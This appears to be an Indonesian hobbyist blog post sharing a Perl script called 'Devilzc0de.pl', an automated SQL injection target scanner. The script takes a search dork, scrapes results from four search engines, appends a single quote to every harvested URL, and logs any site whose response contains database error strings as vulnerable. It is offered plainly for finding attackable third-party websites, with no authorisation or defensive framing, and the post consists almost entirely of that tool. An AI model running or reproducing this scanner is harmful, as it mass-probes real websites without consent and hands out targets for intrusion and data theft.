I'm Not Hacker Just Newbie: script scanner bugs
[ Search :

script scanner bugs


hai guy's,yang hobbi banget maenan bug's pasti kenal yang namanya google dork..itu lhoo..dork buat nyari bug's dengan cepat,tapi kadang kendalanya kita harus cek satu2 web tersebut..kelamaan deh :( ni kemarin jalan2 nemu scanner yang yahud menurut ane,tapi syaratnya harus terinstall Active perl < versi berapa aja>...


#!/usr/bin/perl

system('clear','cls');
                  print "\t=============================================================\n";
                  print "\t=                    Devilzc0de.pl ver.1.1                   =\n";
                  print "\t=                Advanced SQLi Target Scanner                =\n";
                  print "\t=                    Catching your target                    =\n";
                  print "\t=                    With 4 search engine                    =\n";
                  print "\t=                   programmer: gunslinger_                  =\n";
                  print "\t=============================================================\n";
                  print "\n\n";;






                             


use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;



#devilzc0de crew



print q{

};

print "Please input your dork : ";

chomp ($kiddies=<STDIN>);
print "\n";
print "Name file of Searching result : ";
chomp ($peti=<STDIN>);
print "\n\n";



if ($kiddies=~ /(.*)/){
   system('clear','cls');

   print "\n";
                  print "\t=============================================================\n";
                  print "\t=                     Searching...                           =\n";
                  print "\t=============================================================\n";
                  print "\n";;

my $flyff666=$1;
# Starting The Search Engine
my @mlist=&ugds($flyff666);
sub ugds(){
my @lst;
for($spykit=1;$spykit<=1000;$spykit+=1){
#------------------------------------------------------------------------------------------------------------------------
my $wisdom=LWP::UserAgent->new;
$wisdom->agent("");
$wisdom->timeout(30);
#-------------------------------------------------------keep rock guns---------------------------------------------------
my $Doslive=("http://search.live.com/results.aspx?q=".$flyff666."&first=".$spykit."&FORM=PERE");
my $Google=("http://www.google.com/search?q=".$flyff666."&hl=en&start=".$spykit."&sa=N");
my $Gs=("http://www.goodsearch.com/search.aspx?keywords=".$flyff666."&page=".$spykit."&osmax=0");
my $Busca=("http://mundo.busca.uol.com.br/buscar.html?ref=homeuol&ad=on&y=0&q=".$flyff666."&x=0&start=".$spykit."");
#-------------------------------------------------------------------------------------------------------------------------
@array=($Doslive,$Google,$Gs,$Busca);
foreach $scanner(@array){

my $g0nzhack=$wisdom->get($scanner);

$g0nzhack->as_string;

my $Res=$g0nzhack->content;
#-------------------------------------------------------------------------------------------------------------------------

while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)/g){

if($1 !~ /msn|live|microsoft|WindowsLiveTranslator|youtube|google|cache|74.125.153.132|q=|Timeout|Network|Failed|403|404|Antivirus|download|busca|goodsearch|uol/)
   {

   $gunslinger=$1;

         $gunslinger=~s/&(.*)/\ /g;

         if($gunslinger !~ /http:\/\//){
            $link = "http://$gunslinger";
            }

           
            $petik="%27";
            $url = $link.$petik;
            $request = HTTP::Request->new(GET=>$url);
            $useragent = LWP::UserAgent->new();

            $response = $useragent->request($request);
               if ($response->is_success &&
                  $response->content =~ /You have an error in your SQL/ ||
                  $response->content =~ /Division by zero in/ ||
                  $response->content =~ /supplied argument is not a valid MySQL result resource in/ ||
                  $response->content =~ /Call to a member function/||
                  $response->content =~ /Microsoft JET Database/ ||
                  $response->content =~ /Microsoft OLE DB Provider for SQL Server/ ||
                  $response->content =~ /Unclosed quotation mark/ ||
                  $response->content =~ /Microsoft OLE DB Provider for Oracle/ ||
                  $response->content =~ /[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect/ ||
                  $response->content =~ /Incorrect syntax near/ ||
                  $response->content =~ /different number of column/ ||
                  $response->content =~ /err!/ ||
                  $response->content =~ /Warning: mysql_fetch_assoc()/ ||
                  $response->content =~ /Microsoft OLE DB Provider for ODBC Drivers/ ||
                  $response->content =~ /query/ ||
                  $response->content =~ /Query/ ||
                  $response->content =~ /getimagesize()/ ||
                  $response->content =~ /mysql_fetch_assoc()/ ||
                  $response->content =~ /mysql_fetch_array/ ||
                  $response->content =~ /mysql_num_rows()/ ||
                  $response->content =~ /session_start()/ ||
                  $response->content =~ /getimagesize()/ ||
                  $response->content =~ /is_writable()/ ||
                  $response->content =~ /Unknown()/ ||
                  $response->content =~ /session_start()/ ||
                  $response->content =~ /mysql_result()/ ||
                  $response->content =~ /pg_exec()/ ||
                  $response->content =~ /array_merge()/ ||
                  $response->content =~ /filesize()/ ||
                  $response->content =~ /preg_match()/ )

               {
                  $msg = "[+]Vulnerable ! (Sql Injection)";
                 

                  print "Target : $url \n";
                  print "Gathering vulnerability information...\n";
                  print "->$msg\n";
                  print "\n";
                  open(FILE,">>$peti");
                  print FILE "target : $url \n";
                  print FILE "Gathering vulnerability information...\n";
                  print FILE "->$msg\n";
                  print "\n";
                 

                  close(FILE);

}}}

}}}}

                  print "\n====================================================";
                  print "\n             Press Enter to continue...            =";
                  print "\n             Press Ctrl + C to exit...             =";
                  print "\n====================================================\n";




<STDIN>;

system("$0")

0 komentar:

Posting Komentar